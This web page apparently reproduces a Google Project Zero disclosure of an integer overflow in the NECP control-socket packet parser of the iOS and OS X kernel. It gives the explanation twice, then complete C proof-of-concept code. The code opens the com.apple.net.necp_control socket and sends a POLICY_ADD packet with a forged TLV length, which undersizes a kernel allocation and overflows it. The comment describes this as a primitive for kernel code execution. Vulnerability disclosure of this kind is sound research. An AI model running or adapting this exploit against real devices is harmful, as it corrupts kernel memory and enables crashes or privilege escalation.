扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 |
/* Source: https://code.google.com/p/google-security-research/issues/detail?id=543 NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default there are actually a bunch of these providers; they are however all only accessible to root. Nevertheless, on iOS and now (thanks to SIP) OS X this is a real security boundary. necp control sockets are implemented in necp.c. The messages themselves consist of a simple header followed by type-length-value entries. The type field is a single byte and the length is a size_t (ie 8 bytes.) by sending a packed with an id of NECP_PACKET_TYPE_POLICY_ADD we can reach the following loop: // Read policy conditions for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0) { conditions_array_size += (sizeof(u_int8_t) + sizeof(size_t) + condition_size); } } The necp_packet_{find|get}_* functions cope gracefully if the final tlv is waaay bigger than the actual message (like 2^64-1 ;) ) This means that we can overflow conditions_array_size to anything we want very easily. In this PoC the packet contains three policy conditions: one of length 1; one of length 1024 and one of length 2^64-1051; later conditions_array_size is used as the size of a memory allocation: MALLOC(conditions_array, u_int8_t *, conditions_array_size, M_NECP, M_WAITOK); There is then a memory copying loop operating on the undersized array: conditions_array_cursor = 0; for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { u_int8_t condition_type = NECP_TLV_POLICY_CONDITION; size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0 && condition_size <= (conditions_array_size - conditions_array_cursor)) { <-- (a) // Add type memcpy((conditions_array + conditions_array_cursor), &condition_type, sizeof(condition_type)); conditions_array_cursor += sizeof(condition_type); // Add length memcpy((conditions_array + conditions_array_cursor), &condition_size, sizeof(condition_size)); conditions_array_cursor += sizeof(condition_size); // Add value necp_packet_get_tlv_at_offset(packet, cursor, condition_size, (conditions_array + conditions_array_cursor), NULL);<-- (b) There is actually an extra check at (a); this is why we need the first policy_condition of size one (so that the second time through the loop (conditions_array_size[1] - conditions_array_cursor[9]) will underflow allowing us to reach the necp_packet_get_tlv_at_offset call which will then copy the second 1024 byte policy. By contstructing the policy like this we can choose both the allocation size and the overflow amount, a nice primitive for an iOS kernel exploit :) this will crash in weird ways due to the rather small overflow; you can mess with the PoC to make it crash more obviously! But just run this PoC a bunch of times and you'll crash :) Tested on MacBookAir 5,2 w/ OS X 10.10.5 (14F27) */ // ianbeer /* iOS and OS X kernel code execution due to integer overflow in NECP system control socket packet parsing NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default there are actually a bunch of these providers; they are however all only accessible to root. Nevertheless, on iOS and now (thanks to SIP) OS X this is a real security boundary. necp control sockets are implemented in necp.c. The messages themselves consist of a simple header followed by type-length-value entries. The type field is a single byte and the length is a size_t (ie 8 bytes.) by sending a packed with an id of NECP_PACKET_TYPE_POLICY_ADD we can reach the following loop: // Read policy conditions for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0) { conditions_array_size += (sizeof(u_int8_t) + sizeof(size_t) + condition_size); } } The necp_packet_{find|get}_* functions cope gracefully if the final tlv is waaay bigger than the actual message (like 2^64-1 ;) ) This means that we can overflow conditions_array_size to anything we want very easily. In this PoC the packet contains three policy conditions: one of length 1; one of length 1024 and one of length 2^64-1051; later conditions_array_size is used as the size of a memory allocation: MALLOC(conditions_array, u_int8_t *, conditions_array_size, M_NECP, M_WAITOK); There is then a memory copying loop operating on the undersized array: conditions_array_cursor = 0; for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { u_int8_t condition_type = NECP_TLV_POLICY_CONDITION; size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0 && condition_size <= (conditions_array_size - conditions_array_cursor)) { <-- (a) // Add type memcpy((conditions_array + conditions_array_cursor), &condition_type, sizeof(condition_type)); conditions_array_cursor += sizeof(condition_type); // Add length memcpy((conditions_array + conditions_array_cursor), &condition_size, sizeof(condition_size)); conditions_array_cursor += sizeof(condition_size); // Add value necp_packet_get_tlv_at_offset(packet, cursor, condition_size, (conditions_array + conditions_array_cursor), NULL);<-- (b) There is actually an extra check at (a); this is why we need the first policy_condition of size one (so that the second time through the loop (conditions_array_size[1] - conditions_array_cursor[9]) will underflow allowing us to reach the necp_packet_get_tlv_at_offset call which will then copy the second 1024 byte policy. By contstructing the policy like this we can choose both the allocation size and the overflow amount, a nice primitive for an iOS kernel exploit :) this will crash in weird ways due to the rather small overflow; you can mess with the PoC to make it crash more obviously! But just run this PoC a bunch of times and you'll crash :) Tested on MacBookAir 5,2 w/ OS X 10.10.5 (14F27) */ #include <errno.h> #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/kern_control.h> #include <sys/sys_domain.h> #include <net/if.h> #include <netinet/in_var.h> #include <netinet6/nd6.h> #include <arpa/inet.h> #include <sys/ioctl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #define CONTROL_NAME "com.apple.net.necp_control" int ctl_open(void) { int sock; int error = 0; struct ctl_info kernctl_info; struct sockaddr_ctl kernctl_addr; sock = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL); if (sock < 0) { printf("failed to open a SYSPROTO_CONTROL socket: %s", strerror(errno)); goto done; } memset(&kernctl_info, 0, sizeof(kernctl_info)); strlcpy(kernctl_info.ctl_name, CONTROL_NAME, sizeof(kernctl_info.ctl_name)); error = ioctl(sock, CTLIOCGINFO, &kernctl_info); if (error) { printf("Failed to get the control info for control named \"%s\": %s\n", CONTROL_NAME, strerror(errno)); goto done; } memset(&kernctl_addr, 0, sizeof(kernctl_addr)); kernctl_addr.sc_len = sizeof(kernctl_addr); kernctl_addr.sc_family = AF_SYSTEM; kernctl_addr.ss_sysaddr = AF_SYS_CONTROL; kernctl_addr.sc_id = kernctl_info.ctl_id; kernctl_addr.sc_unit = 0; error = connect(sock, (struct sockaddr *)&kernctl_addr, sizeof(kernctl_addr)); if (error) { printf("Failed to connect to the control socket: %s", strerror(errno)); goto done; } done: if (error && sock >= 0) { close(sock); sock = -1; } return sock; } struct necp_packet_header { uint8_t packet_type; uint8_t flags; uint32_tmessage_id; }; uint8_t* add_real_tlv(uint8_t* buf, uint8_t type, size_t len, uint8_t* val){ *buf = type; *(( size_t*)(buf+1)) = len; memcpy(buf+9, val, len); return buf+9+len; } uint8_t* add_fake_tlv(uint8_t* buf, uint8_t type, size_t len, uint8_t* val, size_t real_len){ *buf = type; *(( size_t*)(buf+1)) = len; memcpy(buf+9, val, real_len); return buf+9+real_len; } int main(){ int fd = ctl_open(); if (fd < 0) { printf("failed to get control socket :(\n"); return 1; } printf("got a control socket! %d\n", fd); size_t msg_size; uint8_t* msg = malloc(0x1000); memset(msg, 0, 0x1000); uint8_t* payload = malloc(0x1000); memset(payload, 'A', 0x1000); struct necp_packet_header* hdr = (struct necp_packet_header*) msg; hdr->packet_type = 1; // POLICY_ADD hdr->flags = 0; hdr->message_id = 0; uint8_t* buf = (uint8_t*)(hdr+1); uint32_t order = 0x41414141; buf = add_real_tlv(buf, 2, 4, &order); // NECP_TLV_POLICY_ORDER uint8_t policy = 1; // NECP_POLICY_RESULT_PASS buf = add_real_tlv(buf, 4, 1, &policy); // NECP_TLV_POLICY_RESULT buf = add_real_tlv(buf, 3, 1, payload); // NECP_TLV_POLICY_CONDITION buf = add_real_tlv(buf, 3, 1024, payload); // NECP_TLV_POLICY_CONDITION buf = add_fake_tlv(buf, 3, 0xffffffffffffffff-1050, payload, 0x10); msg_size = buf - msg; send(fd, msg, msg_size, 0); close(fd); return 0; } |
体验盒子
